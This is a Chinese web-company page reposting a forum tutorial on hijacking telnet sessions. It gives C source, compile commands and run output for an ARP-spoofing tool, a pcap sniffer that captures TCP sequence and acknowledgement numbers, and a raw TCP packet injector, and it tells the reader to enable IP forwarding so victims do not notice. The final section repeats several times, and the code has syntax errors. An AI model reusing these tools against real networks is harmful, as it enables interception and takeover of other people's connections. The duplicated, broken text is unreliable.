青海网站建设、网络推广最好的公司--您身边的网站建设专家,马上拿起电话,联系我们:0971-8235355   
青海西宁网站建设、网站制作公司-西宁威势电子信息服务有限公司 首页 |  公司简介 |  网站建设 |  网络推广 |  空间租用 |  域名注册 |  企业邮局 |  网络安全 |  网站编程 |  客服中心 |  联系我们 |  人才招聘
 
西宁威势最新网站制做案例展示
Lastest Project
 
西宁网站建设  
当前位置为:首页 >> 黑客攻防 >> 正文  
[攻防实例]会话劫持 (Session hijacking)

文章来源: 西宁威势电子信息服务有限公司     发布时间:2009-4-15    浏览次数:7221   

会话劫持的介绍
  
  现在很多系统的命令行登录都是不安全的,就好像telnet,rlogin等没有进行加密的通讯,这写都有可以成为我们攻击的对象,由于没有加密, 很容易就可能被人监听,还有“连线劫持“,网上也有很多这类的东西,流传最多的就要数hunt了, 还有dns hijacker, juggernaut等,
  
  攻击示意图:
  
   ____________ _____________
  
   | | hijacking | |
  
   | 攻击者A ------------------------------- 被劫持者B |
  
   |__________| | |____________|
  
   192.168.25.3 | 192.168.25.4
  
   |
  
   __________
  
   | |
  
   | Router |
  
   |________|
  
   |
  
   |
  
   __________
  
   | |
  
   | Router |
  
   |________|
  
   |
  
   |
  
   |
  
   ____________
  
   | |
  
   | 外围主机C | 192.168.25.1
  
   |__________|
  
   
  
   
  
  A和B在同一个区域,当B连接上C的时候, A将对B和C之间的连线进行监听,首先要先在A上对B和C进行arp spoof, 这样的话, B和C之间的对话, 就将从A经过,这时候在A上就可以对B和C的对话进行监听或是对话劫持。 可以进行arp spoof的软件有好多, dsniff里面的arpspoof, arp-sk里的arpspoof都是好用的工具.

作者: 陆哥   回复日期:2003-5-24 3:12:00
  二 Arp欺骗的原理
   _________________________________________________________________
  
   | | | | | |
  
   | Destination MAC | Source MAC | Type | Payload | Checksum |
  
   |___________________|______________|______|_________|___________|
  
   Ethernet Frame
  
   _________________________________________________________________
  
   | | |
  
   | Hardware Type | Protocol type |
  
   |---------------------------------------------------------------|
  
   | HW addr lth | P addr lth | Op code |
  
   |---------------------------------------------------------------|
  
   | Source hardware address |
  
   |---------------------------------------------------------------|
  
   | Source protocol address |
  
   |---------------------------------------------------------------|
  
   | Destination hardware address |
  
   |---------------------------------------------------------------|
  
   | Destination protocol address |
  
   |_______________________________________________________________|
  
   Arp Message
  
   
  
  下面是我抓的一个arp包.
  
  
  
  Packet #1448, Direction: Out, Time:13:24:00.359, Size: 42
  Ethernet II
  Destination MAC: FF:FF:FF:FF:FF:FF |
  Source MAC: 00:01:02:E1:35:84 |------------ Ethernet Frame
  Ethertype: 0x0806 (2054) - ARP |
  ARP
  Hardware: 0x0001 (1) - Ethernet |
  Protocol: 0x0800 (2048) - IP |
  Hardware address length: 0x06 (6) |
  Protocol address length: 0x04 (4) |
  Operation: 0x0001 (1) - ARP Request |------------ Arp Message
  Sender MAC address: 00:01:02:E1:35:84 |
  Sender IP address: 192.168.25.1 |
  Target MAC address: 00:00:00:00:00:00
  Target IP address: 192.168.25.3 |
   
  
  Raw Data:
  0x0000 FF FF FF FF FF FF 00 01-02 E1 35 84 08 06 00 01 ...??...
  0x0010 08 00 06 04 00 01 00 01-02 E1 35 84 C0 A8 19 01 .........?劺?.
  0x0020 00 00 00 00 00 00 C0 A8-19 03 ......括..
现在来看一下如何在本机上得到别人的MAC, 为什么呢, 因为在自己的电脑上有个arp cache, 用来存放以知道的电脑的MAC.
  
   
  
   
  
  [root@chi chi]# /sbin/arp -e
   Address HWtype HWaddress Flags Mask Iface
  192.168.25.1 ether 00:01:02:E1:35:84 C eth0
  [root@chi chi]# ping 192.168.25.2
  PING 192.168.25.2 (192.168.25.2) from 192.168.25.3 : 56(84) bytes of data.
  Warning: time of day goes back (-795us), taking countermeasures.
  64 bytes from 192.168.25.2: icmp_seq=1 ttl=128 time=3.89 ms
  64 bytes from 192.168.25.2: icmp_seq=2 ttl=128 time=3.76 ms
  64 bytes from 192.168.25.2: icmp_seq=3 ttl=128 time=0.969 ms
  
  --- 192.168.25.2 ping statistics ---
  3 packets transmitted, 3 received, 0% loss, time 2014ms
  rtt min/avg/max/mdev = 0.969/2.876/3.897/1.350 ms
  [root@chi chi]# /sbin/arp -e
   Address HWtype HWaddress Flags Mask Iface
  192.168.25.1 ether 00:01:02:E1:35:84 C eth0
  192.168.25.2 ether 00:02:44:33:51:24 C eth0
  [root@chi chi]#
   
  
  本来这个电脑上没有192.168.25.2的mac的, 当时, 当我ping完192.168.25.2后, 用arp就可以查到192.168.25.2的MAC了。当你要连接某台机器的时候,你的电脑就会在arp cache里查看有没有和这个ip对应的mac,如果有的话就取出来用来连接, 如何没有就发送arp request,来得到MAC, 这是电脑自动完成的.所以这个arp cache将是我们的攻击对象.
  
   
  
  在要进行arp spoof 的时候就一定要先要把你要欺骗的ip的mac你搞清楚啦,当还有自己的mac啦. 要得到别的的mac, 要用到ioctl.h这个头文件, 看下面这个代码啦
  
   
  
  /********************************* arp_cache_lookup.c ***************************************/
  
   
  
  #include <sys/types.h>
  #include <sys/socket.h>
  #include <netinet/in.h>
  #include <netinet/if_ether.h>
  #include <sys/ioctl.h>
  
  #include <libnet.h>
  
  int arp_cache_lookup(in_addr_t ip, struct ether_addr *ether)
  {
  int sock;
  struct arpreq ar;
  struct sockaddr_in *sin;
  
  memset((char *)&ar,0, sizeof(ar));
  
  strncpy(ar.arp_dev,“eth0“,sizeof(ar.arp_dev));
  
  sin = (struct sockaddr_in *)&ar.arp_pa;
  sin->sin_family = AF_INET;
  sin->sin_addr.s_addr = ip;
  
  if((sock = socket(AF_INET,SOCK_DGRAM,0)) == -1)
  {
  printf(“socket failt\n“;
  return -1;
  }
  
  
  if(ioctl(sock,SIOCGARP,(caddr_t)&ar) == -1) {
  printf(“no mac found\n“;
  close(sock);
  return -1;
  }
  
  close(sock);
  memcpy(ether->ether_addr_octet,ar.arp_ha.sa_data,ETHER_ADDR_LEN);
  
  return 0;
  }
  
  int main(int arpc, char *argv[])
  {
  in_addr_t target_ip;
  struct ether_addr *target_mac;
  int c;
  
  target_ip = libnet_name_resolve(argv[1],1);
  arp_cache_lookup(target_ip,target_mac);
  
  printf(“MAC address: “;
  for (c = 0; c < 6; c++)
  {
  printf(“%0.2x“, target_mac->ether_addr_octet[c]);
  if(c < 5)
  printf(“:“;
  }
  printf(“\n“;
  }
  
   
  
  /******************************************************************************/
现在我们来运行看看:
  
   
  
  [root@chi chi]# gcc `libnet-config --defines` -o arp_cache_lookup arp_cache_lookup.c `libnet-config --libs`
  [root@chi chi]# ./arp_cache_lookup 192.168.25.2
  no mac found
  MAC address: 00:00:00:00:01:00 (里面没有mac)
  [root@chi chi]# ./arp_cache_lookup 192.168.25.1
  MAC address: 00:01:02:e1:35:84
  Aborted
  [root@chi chi]# ping 192.168.25.2
  PING 192.168.25.2 (192.168.25.2) from 192.168.25.3 : 56(84) bytes of data.
  64 bytes from 192.168.25.2: icmp_seq=1 ttl=128 time=3.75 ms
  64 bytes from 192.168.25.2: icmp_seq=2 ttl=128 time=2.50 ms
  
  --- 192.168.25.2 ping statistics ---
  2 packets transmitted, 2 received, 0% loss, time 1013ms
  rtt min/avg/max/mdev = 2.507/3.129/3.752/0.625 ms
  [root@chi chi]# ./arp_cache_lookup 192.168.25.2
  MAC address: 00:02:44:33:51:24 (现在有了)
  Aborted
  [root@chi chi]#
  
   
  
  所以我们要先加一个udp的socket来连接, 再用arp_cache_lookup来查看, 这样就得到了,你要的mac了,现在先来看看,你要搞的欺骗包了
  
   
  
  Arp reply Pakcet
  
  Packet #65, Direction: In, Time:23:21:44.964, Size: 60
  Ethernet II
  Destination MAC: 00:01:02:E1:35:84 目标的mac,这里是 192.168.25.1的mac
  Source MAC: 00:50:56:46:40:41 这里的是我们自己的mac, 是192.168.25.3
  Ethertype: 0x0806 (2054) - ARP
  ARP
  Hardware: 0x0001 (1) - Ethernet
  Protocol: 0x0800 (2048) - IP
  Hardware address length: 0x06 (6)
  Protocol address length: 0x04 (4)
  Operation: 0x0002 (2) - ARP Response 这里表示ARP Reply
  Sender MAC address: 00:50:56:46:40:41 我们自己的mac
  Sender IP address: 192.168.25.4 要对192.168.25.1进行欺骗的ip
  Target MAC address: 00:01:02:E1:35:84 192.168.25.1的mac
  Target IP address: 192.168.25.1 欺骗对象的ip
  Raw Data:
  0x0000 00 01 02 E1 35 84 00 50-56 46 40 41 08 06 00 01 ...??PVF@A....
  0x0010 08 00 06 04 00 02 00 50-56 46 40 41 C0 A8 19 04 .......PVF@A括..
  0x0020 00 01 02 E1 35 84 C0 A8-19 01 03 40 42 7D 00 40 ...?劺?..@B}.@
  0x0030 40 86 04 08 00 00 00 00-98 90 02 42 @?.....槓.B
  
   
  
  下面这个, 是arp_spoof的程序.
  
  /************************************************************************/
#include <sys/types.h>
  #include <sys/param.h>
  #include <sys/socket.h>
  #include <sys/ioctl.h>
  #include <string.h>
  #include <signal.h>
  #include <net/if.h>
  #include <netinet/in_systm.h>
  #include <netinet/in.h>
  #include <netinet/if_ether.h>
  #include <stdio.h>
  #include <stdlib.h>
  #include <unistd.h>
  
  #include <libnet.h>
  #include <pcap/pcap.h>
  
  struct libnet_link_int *netif;
  struct ether_addr spoof_mac, target_mac;
  in_addr_t spoof_ip,target_ip;
  char *device;
  
  void usage(void)
  {
  printf(“arp spoof\n“;
  printf(“./arp <target_ip> <spoof_ip>\n“;
  exit(1);
  }
  
  int
  send_arp_data(struct libnet_link_int *net, char *dev, int optie,
  u_char *source_mac, in_addr_t source_ip,
  u_char *dest_mac, in_addr_t dest_ip)
  {
  char ebuf[128];
  u_char pkt[60];
  
  if( (source_mac = (u_char *)libnet_get_hwaddr(net,dev,ebuf)) == 0)
  return -1;
  
  libnet_build_ethernet(dest_mac,source_mac, ETHERTYPE_ARP,NULL,0,pkt);
  
  libnet_build_arp(ARPHRD_ETHER,ETHERTYPE_IP,6,4,optie,source_mac,(u_char *)&source_ip,
  dest_mac,(u_char *)&dest_ip,NULL,0,pkt + ETH_H);
printf(“ %s send arp reply to %s\n“,
  libnet_host_lookup(source_ip,0),
  libnet_host_lookup(dest_ip,0));
  
  return (libnet_write_link_layer(net,dev,pkt,sizeof(pkt)) == sizeof(pkt));
  }
  
  int arp_cache_lookup(in_addr_t ip, struct ether_addr *ether)
  {
  int sock;
  struct arpreq ar;
  struct sockaddr_in *sin;
  
  memset((char *)&ar,0,sizeof(ar));
  strncpy(ar.arp_dev,“eth0“,sizeof(ar.arp_dev));
  
  sin = (struct sockaddr_in *)&ar.arp_pa;
  sin->sin_family = AF_INET;
  sin->sin_addr.s_addr = ip;
  
  if(( sock = socket(AF_INET,SOCK_DGRAM,0)) < 0)
  return -1;
  
  if(ioctl(sock,SIOCGARP,(caddr_t)&ar) == -1)
  {
  close(sock);
  return -1;
  }
  
  close(sock);
  memcpy(ether->ether_addr_octet,ar.arp_ha.sa_data,6);
  
  return 0;
  }
  
  int arp_udp(in_addr_t dest_ip)
  {
  struct sockaddr_in *sin;
  int i, sock;
  
  if(( sock = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) < 0)
  return (0);
  
  memset(&sin,0,sizeof(sin));
  sin->sin_family = AF_INET;
  sin->sin_addr.s_addr = dest_ip;
  sin->sin_port = htons(67);
  
  i = sendto(sock,NULL,0,0,(struct sockaddr *)&sin,sizeof(sin));
  
  close(sock);
  
  return ( i == 0);
  }
  
  int arp_search(in_addr_t ip, struct ether_addr *ether)
  {
  int i = 0;
  
  do {
  if(arp_cache_lookup(ip,ether) == 0)
  return 0;
  
  arp_udp(ip);
  sleep(1);
  }
  while(i++ < 3);
  
  return 1;
  }
  
  int main(int argc, char *argv[])
  {
  int c;
  char ebuf[PCAP_ERRBUF_SIZE];
  
  device = NULL;
  spoof_ip = target_ip = 0;
  
  if( argc != 3)
  usage();
  
  target_ip = libnet_name_resolve(argv[1],1);
  spoof_ip = libnet_name_resolve(argv[2],1);
  
  if( (device = pcap_lookupdev(ebuf)) == NULL)
  {
  printf(“no device found\n“;
  exit(-1);
  }
  
  if( (netif = libnet_open_link_interface(device,ebuf)) == 0)
  {
  printf(“ libnet_open_link_interface() error\n“;
  exit(-1);
  }
  
  if( (arp_search(target_ip,&target_mac)) != 0)
  {
  printf(“couldn’t found arp for host %s\n“,
  libnet_host_lookup(target_ip,0));
  exit(-1);
  }
  
  for(; {
  
  send_arp_data(netif,device,ARPOP_REPLY,NULL,spoof_ip,(u_char *)&target_mac,target_ip);
  sleep(2);
  }
  
  exit(1);
  }
  
  /**************************************************************************************/
[root@chi chi]# gcc `libnet-config --defines` -o arp arp.c `libnet-config --libs` -lpcap
  [root@chi chi]# ./arp
  arp spoof
  ./arp <target_ip> <spoof_ip>
  [root@chi chi]# ./arp 192.168.25.1 192.168.25.4
  192.168.25.4 send arp reply to 192.168.25.1
  192.168.25.4 send arp reply to 192.168.25.1
  192.168.25.4 send arp reply to 192.168.25.1
  192.168.25.4 send arp reply to 192.168.25.1
  192.168.25.4 send arp reply to 192.168.25.1
  ~c
  
  [root@chi chi]#
  
  我对上面的程序进行了编辑, 并对192.168.25.1进行欺骗, 下面我来对照一下欺骗前后的arp table的变化.
  
  *===============================================================
  欢迎使用 Microsoft Telnet 服务器。
  *===============================================================
  C:\>arp -a (欺骗前)
  
  Interface: 192.168.25.1 on Interface 0x4
  
  Internet Address Physical Address Type
  192.168.25.3 00-50-56-46-40-41 dynamic
  192.168.25.4 00-50-56-46-40-68 dynamic
  
  C:\>arp -a (欺骗后)
  
  Interface: 192.168.25.1 on Interface 0x4
  Internet Address Physical Address Type
  192.168.25.3 00-50-56-46-40-41 dynamic
  192.168.25.4 00-50-56-46-40-41 dynamic
  
  然后再对192.168.25.4进行欺骗, 这样的话,所有192.168.25.3和192.168.25.1之间的通讯都会经过192.168.25.3, 不过,在这之前,我们要对
  
  /proc/sys/net/ipv4/ip_forward进行编辑. 这样192.168.25.3和192.168.25.1就不会发觉有人监听了.
  
  
  [root@chi chi]# cat /proc/sys/net/ipv4/ip_forward
  0
  [root@chi chi]# cat >/proc/sys/net/ipv4/ip_forward
  1
  
  [root@chi chi]# cat /proc/sys/net/ipv4/ip_forward
  1
  [root@chi chi]#
会话劫持的原理
  
   
  
  Tcp Protocol :
  
   
  
   0 4 8 16 19 24 32
   -------------------------------------------------------------------------
   | Source Port | Destination Port |
   -------------------------------------------------------------------------
   | Sequence Number |
   -------------------------------------------------------------------------
   | Acknowledgment Number |
   -------------------------------------------------------------------------
   | HLEN | Reserved | Code Bits | Window |
   -------------------------------------------------------------------------
   | Checksum | Urgent Pointer |
   -------------------------------------------------------------------------
   | Options | Padding |
   -------------------------------------------------------------------------
   | Data |
   -------------------------------------------------------------------------
  
   
  
  The TCP 报文的内容:
  
   Source Port: 源主机的端口
   Destination Port: 目标主机端口
   Sequence number: 如是syn的话,序列码实际上是初始序列码
   Acknowledgment Number: 如果设置了ACK控制位,这个值表示一个准备接收的包的序列码
   Hlen: 指示何处数据开始
   Control Bits:
  
   URG: Urgent Pointer;
   ACK: Acknowledgment;
   PSH: Push Function;
   RST: Reset the connection;
   SYN: Synchronize sequence numbers;
   FIN: No more data from sender;
  
   Window: 窗口
   Checksum: 校验位
   Urgent Pointer: 优先指针
   Options:
  
   
  
  接下去, 我们来截到3个Tcp包
  
  ===========================================================================
Packet #4, Direction: In, Time:14:35:43.954, Size: 74
  
  TCP
  Source port: 1028
  Destination port: 23
  Sequence: 0x5AE82A25 (1525164581) <----- SEQ 是clientnr
  Acknowledgement: 0x00000000 (0)
  Header length: 0x0A (10) - 40 bytes
  Flags: SYN <----- Flags,从client发送的.
  URG: 0
  ACK: 0
  PSH: 0
  RST: 0
  SYN: 1
  FIN: 0
  Window: 0x16D0 (5840)
  Checksum: 0x1E28 (7720) - correct
  Urgent Pointer: 0x0000 (0)
  TCP Options
  Maximum Segment Size: 0x05B4 (1460)
  Sack-Permitted
  Timestamps
  Value: 0x0001D690 (120464)
  Echo Reply: 0x00000000 (0)
  Window Scale: 0x00 (0)
  Data length: 0x0 (0)
  
  
  ============================================================================
  
  Packet #5, Direction: Out, Time:14:35:43.964, Size: 78
  
  TCP
  Source port: 23
  Destination port: 1028
  Sequence: 0xC9CB8F02 (3385560834) <---- SEQ 是servernr
  Acknowledgement: 0x5AE82A26 (1525164582) <---- ACK 是clientnr+1
  Header length: 0x0B (11) - 44 bytes
  Flags: SYN ACK <---- Flags: SYN ACK
  URG: 0
  ACK: 1
  PSH: 0
  RST: 0
  SYN: 1
  FIN: 0
  Window: 0x4470 (17520)
  Checksum: 0x5C34 (23604) - correct
  Urgent Pointer: 0x0000 (0)
  TCP Options
  Maximum Segment Size: 0x05B4 (1460)
  Window Scale: 0x00 (0)
  Timestamps
  Value: 0x00000000 (0)
  Echo Reply: 0x00000000 (0)
  Sack-Permitted
  Data length: 0x0 (0)
  
  
  ============================================================================
  
  Packet #6, Direction: In, Time:14:35:43.964, Size: 66
  
  TCP
  Source port: 1028
  Destination port: 23
  Sequence: 0x5AE82A26 (1525164582) <---- SEQ 是clientnr+1
  Acknowledgement: 0xC9CB8F03 (3385560835) <---- ACK 是servernr+1
  Header length: 0x08 (8) - 32 bytes
  Flags: ACK <---- Flags: ACK
  URG: 0
  ACK: 1
  PSH: 0
  RST: 0
  SYN: 0
  FIN: 0
  Window: 0x16D0 (5840)
  Checksum: 0xF40D (62477) - correct
  Urgent Pointer: 0x0000 (0)
  TCP Options
  Timestamps
  Value: 0x0001D690 (120464)
  Echo Reply: 0x00000000 (0)
  Data length: 0x0 (0)
  
  ============================================================================
Packet 1: Client -> Server
  
   flags: SYN
  
   SEQ : clientnr 1525164581
  
  Packet 2: Server -> Client
  
   flags: SYN, ACK
  
  
   SEQ : servernr 3385560834
  
   ACK : clientnr+1 1525164582
  
  Packet 3: Client -> Server
  
   flags: ACK
  
   SEQ : clientnr+1 1525164582
  
   ACK : servernr+1 3385560835
   
  
  上面这些是一个tcp/ip对话的通讯过程. 要对一个线程进行劫持的话, 找到对话的SEQ和ACK是最主要的.当你找到了后, 就可以利用它们
  
  来作你自己要发的Tcp包, 并让对方主机执行它.下面这段代码是演示如何找到一个对话的SEQ和ACK.
  
   
  
   
  
  /*****************************get_seq_ack.c***************************************/
  
   
  
  #include <stdio.h>
  #include <stdlib.h>
  #include <string.h>
  #include <libnet.h>
  #include <pcap/pcap.h>
  #include <signal.h>
  #include <unistd.h>
  #include <sys/socket.h>
  
  #define TELNET 23
  
  u_long src_ip, dst_ip, src_port,dst_port;
  u_long seq,ack;
  
  void get_seq_ack(u_long src_ip,u_long dst_ip,u_long src_port,u_long dst_port)
  {
  pcap_t *p;
  char errbuf[PCAP_ERRBUF_SIZE];
  u_char *buf;
  struct ip iphd;
  struct tcphdr tcphd;
  int ethrhdr;
  char *device;
  
  if ( (device = pcap_lookupdev(errbuf)) == NULL )
  {
  printf(“could not found interface\n“;
  exit(-1);
  }
  else
  printf(“device = %s\n“, device);
  
  if( (p = pcap_open_live(device,65535,1,60,errbuf)) == 0)
  {
  printf(“pcap_open_live: %s\n“,errbuf);
  exit(-1);
  }
  
  if( pcap_datalink(p) == DLT_EN10MB)
  ethrhdr = 14;
  
  printf(“Connection form %s to %s \n“,
  libnet_host_lookup(src_ip,0),
  libnet_host_lookup(dst_ip,0));
  printf(“wait for SEQ/ACK :\n“;
  
  for (;
  {
  struct pcap_pkthdr pkthdr;
  
  buf = (u_char *) pcap_next(p, &pkthdr);
  if (buf)
  {
  memcpy(&iphd, buf + ethrhdr, sizeof(iphd));
  if (iphd.ip_p == IPPROTO_TCP)
  if ((iphd.ip_src.s_addr == src_ip) || (iphd.ip_dst.s_addr == dst_ip))
  {
  memcpy(&tcphd, buf + ethrhdr + sizeof(iphd), sizeof(tcphd));
  if (tcphd.th_dport == htons(dst_port))
  src_port = tcphd.th_sport;
  }
  }
  else
  continue;
  
  if (tcphd.th_flags == TH_ACK)
  {
  printf(“Got packet! SEQ = 0x%lx ACK = 0x%lx\n“, htonl(tcphd.th_seq), htonl(tcphd.th_ack));
  
  }
  else
  continue;
  pcap_close(p);
  
  printf(“source_port is %d\n“, htons(src_port));
  printf(“dest_port is %d\n“,dst_port);
  return;
  }
  }
  
  int main(int argc, char *argv[])
  {
  if( argc < 3)
  {
  printf(“ get_seq_ack.c\n“;
  printf(“./get_seq_ack <source_ip> <dest_ip>\n“;
  exit(-1);
  }
  
  src_ip = inet_addr(argv[1]);
  dst_ip = inet_addr(argv[2]);
  dst_port = atol(“TELNET“;
  
  get_seq_ack(src_ip,dst_ip,src_port,dst_port);
  
  
  }
  
  /***********************************************************************************
这个程序是修改来的,原理是采用pcap来抓包,并把抓到的报文进行解码,如何遇到是Ack flags的,就把包中的SEQ和ACK取得出来.
  
  对程序进行调试并找到SEQ和ACK:
  
   
  
  [root@chi chi]# gcc -o get_seq_ack get_seq_ack.c `libnet-config --defines` `libnet-config --libs` -lpcap -lnet
  [root@chi chi]# ./get_seq_ack
  get_seq_ack.c
  ./get_seq_ack <source_ip> <dest_ip>
  [root@chi chi]# ./get_seq_ack 192.168.25.1 192.168.25.4
  device = eth0
  Connection form 192.168.25.1 to 192.168.25.4
  wait for SEQ/ACK :
  Got packet! SEQ = 0x4eb9d6ca ACK = 0x83005cc
  source_port is 3486
  dest_port is 23
  [root@chi chi]#
  这上面的SEQ = 0x4eb9d6ca ACK = 0x83005cc,接下来就是用它们来建立 “假的”IP和Tcp包.
  
   
  
  ======================================================================================
  
  接下去我们要先建立你要发送的IP包, 下面是Ip protocol,我们用libnet来建立ip是很简单的;
  
  
  
  Ip protocol :
  
  
  
   0 4 8 16 19 24 32
   ------------------------------------------------------------------------
   | VERS | HLEN | Service Type | Total Length |
   ------------------------------------------------------------------------
   | Identification | Flags | Fragment Offset |
   ------------------------------------------------------------------------
   | Source IP Address |
   ------------------------------------------------------------------------
   | Destination IP Address |
   ------------------------------------------------------------------------
   | IP Options | Padding |
   ------------------------------------------------------------------------
   | Data |
   ------------------------------------------------------------------------
  
  对ip packet的介绍我就不写啦, 太麻烦啦, 那我就用libnet建立个ip包和tcp包,如何你不懂的话,scz写过libnet的介绍,上面写的很清楚你要做的。
  
   
  
  /******************************************************************************/
  
  Written by spwny
  
   
  
  void
  sendtcp(u_long srcip, u_long dstip, u_long sport, u_long dport, u_char flags, u_long seq, u_long ack, char *data, int datalen)
  {
  u_char *packet;
  int fd, psize;
  
  psize = LIBNET_IP_H + LIBNET_TCP_H + datalen;
  libnet_init_packet(psize, &packet);
   
  
  if (!packet)
  libnet_error(LIBNET_ERR_FATAL, “libnet_init_packet failed\n“;
  fd = libnet_open_raw_sock(IPPROTO_RAW);
  if ((fd = libnet_open_raw_sock(IPPROTO_RAW)) == -1)
  libnet_error(LIBNET_ERR_FATAL, “libnet_open_raw_sock failed\n“;
  
  libnet_build_ip(LIBNET_TCP_H + datalen, 0, random(), 0, lrandom(128, 255), IPPROTO_TCP, srcip, dstip, NULL, 0, packet);
  libnet_build_tcp(sport, dport, seq, ack, flags, 65535, 0, (u_char *) data, datalen, packet + LIBNET_IP_H);
  
  if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H + datalen) == -1)
  libnet_error(LIBNET_ERR_FATAL, “libnet_do_checksum failed\n“;
  libnet_write_ip(fd, packet, psize);
  libnet_close_raw_sock(fd);
  libnet_destroy_packet(&packet);
  }
  
   
  
  /********************************************************************************/
这个程序是修改来的,原理是采用pcap来抓包,并把抓到的报文进行解码,如何遇到是Ack flags的,就把包中的SEQ和ACK取得出来.
  
  对程序进行调试并找到SEQ和ACK:
  
   
  
  [root@chi chi]# gcc -o get_seq_ack get_seq_ack.c `libnet-config --defines` `libnet-config --libs` -lpcap -lnet
  [root@chi chi]# ./get_seq_ack
  get_seq_ack.c
  ./get_seq_ack <source_ip> <dest_ip>
  [root@chi chi]# ./get_seq_ack 192.168.25.1 192.168.25.4
  device = eth0
  Connection form 192.168.25.1 to 192.168.25.4
  wait for SEQ/ACK :
  Got packet! SEQ = 0x4eb9d6ca ACK = 0x83005cc
  source_port is 3486
  dest_port is 23
  [root@chi chi]#
  这上面的SEQ = 0x4eb9d6ca ACK = 0x83005cc,接下来就是用它们来建立 “假的”IP和Tcp包.
  
   
  
  ======================================================================================
  
  接下去我们要先建立你要发送的IP包, 下面是Ip protocol,我们用libnet来建立ip是很简单的;
  
  
  
  Ip protocol :
  
  
  
   0 4 8 16 19 24 32
   ------------------------------------------------------------------------
   | VERS | HLEN | Service Type | Total Length |
   ------------------------------------------------------------------------
   | Identification | Flags | Fragment Offset |
   ------------------------------------------------------------------------
   | Source IP Address |
   ------------------------------------------------------------------------
   | Destination IP Address |
   ------------------------------------------------------------------------
   | IP Options | Padding |
   ------------------------------------------------------------------------
   | Data |
   ------------------------------------------------------------------------
  
  对ip packet的介绍我就不写啦, 太麻烦啦, 那我就用libnet建立个ip包和tcp包,如何你不懂的话,scz写过libnet的介绍,上面写的很清楚你要做的。
  
   
  
  /******************************************************************************/
  
  Written by spwny
  
   
  
  void
  sendtcp(u_long srcip, u_long dstip, u_long sport, u_long dport, u_char flags, u_long seq, u_long ack, char *data, int datalen)
  {
  u_char *packet;
  int fd, psize;
  
  psize = LIBNET_IP_H + LIBNET_TCP_H + datalen;
  libnet_init_packet(psize, &packet);
   
  
  if (!packet)
  libnet_error(LIBNET_ERR_FATAL, “libnet_init_packet failed\n“;
  fd = libnet_open_raw_sock(IPPROTO_RAW);
  if ((fd = libnet_open_raw_sock(IPPROTO_RAW)) == -1)
  libnet_error(LIBNET_ERR_FATAL, “libnet_open_raw_sock failed\n“;
  
  libnet_build_ip(LIBNET_TCP_H + datalen, 0, random(), 0, lrandom(128, 255), IPPROTO_TCP, srcip, dstip, NULL, 0, packet);
  libnet_build_tcp(sport, dport, seq, ack, flags, 65535, 0, (u_char *) data, datalen, packet + LIBNET_IP_H);
  
  if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H + datalen) == -1)
  libnet_error(LIBNET_ERR_FATAL, “libnet_do_checksum failed\n“;
  libnet_write_ip(fd, packet, psize);
  libnet_close_raw_sock(fd);
  libnet_destroy_packet(&packet);
  }
  
   
  
  /********************************************************************************/
这个程序是修改来的,原理是采用pcap来抓包,并把抓到的报文进行解码,如何遇到是Ack flags的,就把包中的SEQ和ACK取得出来.
  
  对程序进行调试并找到SEQ和ACK:
  
   
  
  [root@chi chi]# gcc -o get_seq_ack get_seq_ack.c `libnet-config --defines` `libnet-config --libs` -lpcap -lnet
  [root@chi chi]# ./get_seq_ack
  get_seq_ack.c
  ./get_seq_ack <source_ip> <dest_ip>
  [root@chi chi]# ./get_seq_ack 192.168.25.1 192.168.25.4
  device = eth0
  Connection form 192.168.25.1 to 192.168.25.4
  wait for SEQ/ACK :
  Got packet! SEQ = 0x4eb9d6ca ACK = 0x83005cc
  source_port is 3486
  dest_port is 23
  [root@chi chi]#
  这上面的SEQ = 0x4eb9d6ca ACK = 0x83005cc,接下来就是用它们来建立 “假的”IP和Tcp包.
  
   
  
  ======================================================================================
  
  接下去我们要先建立你要发送的IP包, 下面是Ip protocol,我们用libnet来建立ip是很简单的;
  
  
  
  Ip protocol :
  
  
  
   0 4 8 16 19 24 32
   ------------------------------------------------------------------------
   | VERS | HLEN | Service Type | Total Length |
   ------------------------------------------------------------------------
   | Identification | Flags | Fragment Offset |
   ------------------------------------------------------------------------
   | Source IP Address |
   ------------------------------------------------------------------------
   | Destination IP Address |
   ------------------------------------------------------------------------
   | IP Options | Padding |
   ------------------------------------------------------------------------
   | Data |
   ------------------------------------------------------------------------
  
  对ip packet的介绍我就不写啦, 太麻烦啦, 那我就用libnet建立个ip包和tcp包,如何你不懂的话,scz写过libnet的介绍,上面写的很清楚你要做的。
  
   
  
  /******************************************************************************/
  
  Written by spwny
  
   
  
  void
  sendtcp(u_long srcip, u_long dstip, u_long sport, u_long dport, u_char flags, u_long seq, u_long ack, char *data, int datalen)
  {
  u_char *packet;
  int fd, psize;
  
  psize = LIBNET_IP_H + LIBNET_TCP_H + datalen;
  libnet_init_packet(psize, &packet);
   
  
  if (!packet)
  libnet_error(LIBNET_ERR_FATAL, “libnet_init_packet failed\n“;
  fd = libnet_open_raw_sock(IPPROTO_RAW);
  if ((fd = libnet_open_raw_sock(IPPROTO_RAW)) == -1)
  libnet_error(LIBNET_ERR_FATAL, “libnet_open_raw_sock failed\n“;
  
  libnet_build_ip(LIBNET_TCP_H + datalen, 0, random(), 0, lrandom(128, 255), IPPROTO_TCP, srcip, dstip, NULL, 0, packet);
  libnet_build_tcp(sport, dport, seq, ack, flags, 65535, 0, (u_char *) data, datalen, packet + LIBNET_IP_H);
  
  if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H + datalen) == -1)
  libnet_error(LIBNET_ERR_FATAL, “libnet_do_checksum failed\n“;
  libnet_write_ip(fd, packet, psize);
  libnet_close_raw_sock(fd);
  libnet_destroy_packet(&packet);
  }
  
   
  
  /********************************************************************************/
这个程序是修改来的,原理是采用pcap来抓包,并把抓到的报文进行解码,如何遇到是Ack flags的,就把包中的SEQ和ACK取得出来.
  
  对程序进行调试并找到SEQ和ACK:
  
   
  
  [root@chi chi]# gcc -o get_seq_ack get_seq_ack.c `libnet-config --defines` `libnet-config --libs` -lpcap -lnet
  [root@chi chi]# ./get_seq_ack
  get_seq_ack.c
  ./get_seq_ack <source_ip> <dest_ip>
  [root@chi chi]# ./get_seq_ack 192.168.25.1 192.168.25.4
  device = eth0
  Connection form 192.168.25.1 to 192.168.25.4
  wait for SEQ/ACK :
  Got packet! SEQ = 0x4eb9d6ca ACK = 0x83005cc
  source_port is 3486
  dest_port is 23
  [root@chi chi]#
